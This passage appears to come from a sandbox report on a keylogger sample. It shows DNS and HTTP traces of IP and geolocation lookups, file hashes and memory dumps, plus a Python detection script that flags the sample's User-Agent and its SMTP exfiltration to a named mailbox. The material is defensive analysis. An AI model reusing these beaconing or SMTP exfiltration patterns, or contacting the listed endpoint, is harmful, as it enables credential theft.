    134.177.67.172.in-addr.arpa
    IN PTR
    Response
  • Country: US
    DNS
    28.118.140.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    28.118.140.52.in-addr.arpa
    IN PTR
    Response
  • Country: US
    DNS
    53.210.109.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    53.210.109.20.in-addr.arpa
    IN PTR
    Response
  • Country: US
    DNS
    171.39.242.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    171.39.242.20.in-addr.arpa
    IN PTR
    Response
  • Country: US
    DNS
    21.236.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    21.236.111.52.in-addr.arpa
    IN PTR
    Response
  • 132.226.247.73:80
    http://checkip.dyndns.org/
    http
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    1.9kB
    3.5kB
    17
    15

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200
  • 172.67.177.134:443
    https://reallyfreegeoip.org/xml/181.215.176.83
    tls, http
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    2.1kB
    13.8kB
    22
    14

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200
  • 8.8.8.8:53
    228.249.119.40.in-addr.arpa
    dns
    73 B
    159 B
    1
    1

    DNS Request

    228.249.119.40.in-addr.arpa

  • 8.8.8.8:53
    88.210.23.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    88.210.23.2.in-addr.arpa

  • 8.8.8.8:53
    0.159.190.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    0.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    154.239.44.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    154.239.44.20.in-addr.arpa

  • 8.8.8.8:53
    checkip.dyndns.org
    dns
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    64 B
    176 B
    1
    1

    DNS Request

    checkip.dyndns.org

    DNS Response

    132.226.247.73
    193.122.130.0
    193.122.6.168
    132.226.8.169
    158.101.44.242

  • 8.8.8.8:53
    reallyfreegeoip.org
    dns
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    65 B
    97 B
    1
    1

    DNS Request

    reallyfreegeoip.org

    DNS Response

    172.67.177.134
    104.21.67.152

  • 8.8.8.8:53
    73.247.226.132.in-addr.arpa
    dns
    73 B
    158 B
    1
    1

    DNS Request

    73.247.226.132.in-addr.arpa

  • 8.8.8.8:53
    134.177.67.172.in-addr.arpa
    dns
    73 B
    135 B
    1
    1

    DNS Request

    134.177.67.172.in-addr.arpa

  • 8.8.8.8:53
    28.118.140.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    28.118.140.52.in-addr.arpa

  • 8.8.8.8:53
    53.210.109.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    53.210.109.20.in-addr.arpa

  • 8.8.8.8:53
    171.39.242.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    171.39.242.20.in-addr.arpa

  • 8.8.8.8:53
    21.236.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    21.236.111.52.in-addr.arpa
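
The network capture above and the SMTP credentials in the Malware Config section together give the observable shape of this family on the wire: a plain-HTTP GET to checkip.dyndns.org with a hard-coded MSIE 6.0 / .NET CLR 1.0.3705 User-Agent, an immediate HTTPS GET to reallyfreegeoip.org/xml/<the address checkip returned>, and then SMTP submission on port 587 to the configured mailbox. The following is an added example, not part of the sandbox report, that runs those three rules over a constructed proxy/flow log. The log rows, source addresses and the 60-second pairing window are assumptions; the hosts, User-Agent and SMTP endpoint are the ones on this page.

```python
"""Network-side detection for the lookup-then-geolocate beacon and SMTP exfil (added example)."""
import csv
import io
import ipaddress
import re

# Indicators taken from this report: the hard-coded User-Agent on the checkip requests
# and the SMTP host/port from the extracted configuration.
SNAKE_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"
EXFIL_SMTP = {("mail.murchisonspice.co.za", 587)}
GEOIP_PATH = re.compile(r"^/xml/(\d{1,3}(?:\.\d{1,3}){3})$")

# Constructed flow log (not from the report). Paths on port 443 assume a TLS-inspecting
# proxy; without one, only the SNI host and port are available to the geoip rule.
LOG = """ts,src,dst_host,dst_port,proto,user_agent,path
1733455549,10.0.0.5,checkip.dyndns.org,80,http,Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;),/
1733455549,10.0.0.5,reallyfreegeoip.org,443,tls,,/xml/181.215.176.83
1733455550,10.0.0.5,checkip.dyndns.org,80,http,Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;),/
1733455560,10.0.0.5,mail.murchisonspice.co.za,587,smtp,,
1733455600,10.0.0.9,www.example.com,443,tls,,/index.html
1733455610,10.0.0.9,checkip.dyndns.org,80,http,curl/8.4.0,/
"""


def parse(text):
    rows = list(csv.DictReader(io.StringIO(text)))
    for r in rows:
        r["ts"] = int(r["ts"])
        r["dst_port"] = int(r["dst_port"])
    return rows


def is_public(ip):
    """True for a routable address; the geoip rule ignores private/bogus addresses."""
    try:
        return ipaddress.ip_address(ip).is_global
    except ValueError:
        return False


def detect(rows, window=60):
    """Return one alert per matching event; rules run per source host in time order."""
    alerts = []
    by_src = {}
    for r in rows:
        by_src.setdefault(r["src"], []).append(r)
    for src, evs in by_src.items():
        evs.sort(key=lambda r: r["ts"])
        last_checkip = None
        for r in evs:
            # Rule 1: the exact legacy User-Agent this sample sends to checkip.
            if r["user_agent"] == SNAKE_UA:
                alerts.append({"rule": "snakekeylogger_user_agent", "src": src,
                               "ts": r["ts"], "host": r["dst_host"]})
            # Rule 2: external-IP lookup followed within `window` seconds by a geoip
            # query for a public address (the host's own egress IP, as the malware sees it).
            if r["dst_host"].startswith("checkip.dyndns."):
                last_checkip = r["ts"]
            m = GEOIP_PATH.match(r["path"]) if r["dst_host"] == "reallyfreegeoip.org" else None
            if (m and last_checkip is not None and r["ts"] - last_checkip <= window
                    and is_public(m.group(1))):
                alerts.append({"rule": "external_ip_then_geoip", "src": src,
                               "ts": r["ts"], "egress_ip": m.group(1)})
            # Rule 3: any connection to the SMTP endpoint from the extracted config.
            if (r["dst_host"], r["dst_port"]) in EXFIL_SMTP:
                alerts.append({"rule": "smtp_to_extracted_c2", "src": src, "ts": r["ts"],
                               "host": r["dst_host"], "port": r["dst_port"]})
    return alerts


def rules_by_src(alerts):
    """Map source host -> set of rule names it triggered, for triage."""
    out = {}
    for a in alerts:
        out.setdefault(a["src"], set()).add(a["rule"])
    return out


if __name__ == "__main__":
    for a in detect(parse(LOG)):
        print(a)
```

Both lookup services are used by plenty of legitimate software, which is why the second rule keys on the checkip-then-geoip pairing rather than on either host alone; the 10.0.0.9 control row (a curl to checkip with no follow-up) produces nothing. The address in the geoip path, 181.215.176.83 in this run, is the sandbox's egress IP as reported by checkip, not a victim or C2 address, so it should be recorded as context and not added to a blocklist. The SMTP rule is the only one that needs no behavioural context: a workstation opening port 587 to the mailbox in the extracted config is exfiltration by definition.
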

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe.log

    Filesize

    1KB

    MD5

    8ec831f3e3a3f77e4a7b9cd32b48384c

    SHA1

    d83f09fd87c5bd86e045873c231c14836e76a05c

    SHA256

    7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982

    SHA512

    26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    968cb9309758126772781b83adb8a28f

    SHA1

    8da30e71accf186b2ba11da1797cf67f8f78b47c

    SHA256

    92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

    SHA512

    4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    96109f157bcb9723f664ba90b9e3e10c

    SHA1

    2ece16a983cc356f2d57c7379de669e6283d5e0b

    SHA256

    f831e35e888c4d44d81cc6d7ad3e05a1dc0bd4aa0472a2fdf3752f0ef1cb4703

    SHA512

    a4da55d2e3f0af7f0db198816e969c13cee4b25e26ab683ef2dc0b2c024575c847ea3776bdbd50e6cd9a44d007636f8e0b2647691dc9f34e24dad054f17a5d57

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yxiggxsw.vty.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\tmpC9B8.tmp

    Filesize

    1KB

    MD5

    850b89ac068ae6b302412f5c97e42bf6

    SHA1

    80db1b578078b31d1d256fef22017a1ac1faeaec

    SHA256

    f682e13f403c22eea060efeaa16b8be21e7275fc4ab2047264929df6a6c984b8

    SHA512

    367a2679e4219cb2b8ecf35a62525e78a1f374040d61506a602944d5d209310e1df9616c788a53c06881e274438f863ed5778938c9ddb871363e11a99021fbe5

  • memory/2256-50-0x0000000006E80000-0x0000000006ECC000-memory.dmp

    Filesize

    304KB

  • memory/2256-16-0x0000000074900000-0x00000000750B0000-memory.dmp

    Filesize

    7.7MB

  • memory/2256-44-0x0000000074900000-0x00000000750B0000-memory.dmp

    Filesize

    7.7MB

  • memory/2256-66-0x0000000075180000-0x00000000751CC000-memory.dmp

    Filesize

    304KB

  • memory/2256-19-0x0000000005930000-0x0000000005952000-memory.dmp

    Filesize

    136KB

  • memory/2256-89-0x0000000074900000-0x00000000750B0000-memory.dmp

    Filesize

    7.7MB

  • memory/2256-15-0x0000000005340000-0x0000000005376000-memory.dmp

    Filesize

    216KB

  • memory/2256-49-0x00000000068F0000-0x000000000690E000-memory.dmp

    Filesize

    120KB

  • memory/2256-17-0x0000000005AF0000-0x0000000006118000-memory.dmp

    Filesize

    6.2MB

  • memory/2256-18-0x0000000074900000-0x00000000750B0000-memory.dmp

    Filesize

    7.7MB

  • memory/2256-81-0x0000000007F60000-0x0000000007F7A000-memory.dmp

    Filesize

    104KB

  • memory/2256-80-0x0000000007E60000-0x0000000007E74000-memory.dmp

    Filesize

    80KB

  • memory/2256-21-0x00000000062D0000-0x0000000006336000-memory.dmp

    Filesize

    408KB

  • memory/2256-78-0x0000000007E20000-0x0000000007E31000-memory.dmp

    Filesize

    68KB

  • memory/2256-33-0x0000000006340000-0x0000000006694000-memory.dmp

    Filesize

    3.3MB

  • memory/2256-20-0x00000000059D0000-0x0000000005A36000-memory.dmp

    Filesize

    408KB

  • memory/3744-8-0x000000007490E000-0x000000007490F000-memory.dmp

    Filesize

    4KB

  • memory/3744-10-0x0000000006B20000-0x0000000006B88000-memory.dmp

    Filesize

    416KB

  • memory/3744-9-0x0000000074900000-0x00000000750B0000-memory.dmp

    Filesize

    7.7MB

  • memory/3744-0-0x000000007490E000-0x000000007490F000-memory.dmp

    Filesize

    4KB

  • memory/3744-7-0x00000000051E0000-0x00000000051F2000-memory.dmp

    Filesize

    72KB

  • memory/3744-48-0x0000000074900000-0x00000000750B0000-memory.dmp

    Filesize

    7.7MB

  • memory/3744-6-0x0000000005000000-0x000000000509C000-memory.dmp

    Filesize

    624KB

  • memory/3744-5-0x0000000074900000-0x00000000750B0000-memory.dmp

    Filesize

    7.7MB

  • memory/3744-4-0x0000000004F40000-0x0000000004F4A000-memory.dmp

    Filesize

    40KB

  • memory/3744-3-0x0000000004D80000-0x0000000004E12000-memory.dmp

    Filesize

    584KB

  • memory/3744-2-0x0000000005230000-0x00000000057D4000-memory.dmp

    Filesize

    5.6MB

  • memory/3744-1-0x0000000000320000-0x00000000003A6000-memory.dmp

    Filesize

    536KB

  • memory/4984-47-0x0000000074900000-0x00000000750B0000-memory.dmp

    Filesize

    7.7MB

  • memory/4984-62-0x0000000006980000-0x000000000699E000-memory.dmp

    Filesize

    120KB

  • memory/4984-64-0x0000000007CE0000-0x000000000835A000-memory.dmp

    Filesize

    6.5MB

  • memory/4984-76-0x0000000007700000-0x000000000770A000-memory.dmp

    Filesize

    40KB

  • memory/4984-77-0x0000000007910000-0x00000000079A6000-memory.dmp

    Filesize

    600KB

  • memory/4984-63-0x0000000007360000-0x0000000007403000-memory.dmp

    Filesize

    652KB

  • memory/4984-79-0x00000000078C0000-0x00000000078CE000-memory.dmp

    Filesize

    56KB

  • memory/4984-65-0x0000000007690000-0x00000000076AA000-memory.dmp

    Filesize

    104KB

  • memory/4984-52-0x0000000075180000-0x00000000751CC000-memory.dmp

    Filesize

    304KB

  • memory/4984-82-0x00000000079B0000-0x00000000079B8000-memory.dmp

    Filesize

    32KB

  • memory/4984-51-0x0000000006940000-0x0000000006972000-memory.dmp

    Filesize

    200KB

  • memory/4984-27-0x0000000074900000-0x00000000750B0000-memory.dmp

    Filesize

    7.7MB

  • memory/4984-88-0x0000000074900000-0x00000000750B0000-memory.dmp

    Filesize

    7.7MB

  • memory/4984-43-0x0000000074900000-0x00000000750B0000-memory.dmp

    Filesize

    7.7MB

  • memory/5088-45-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB
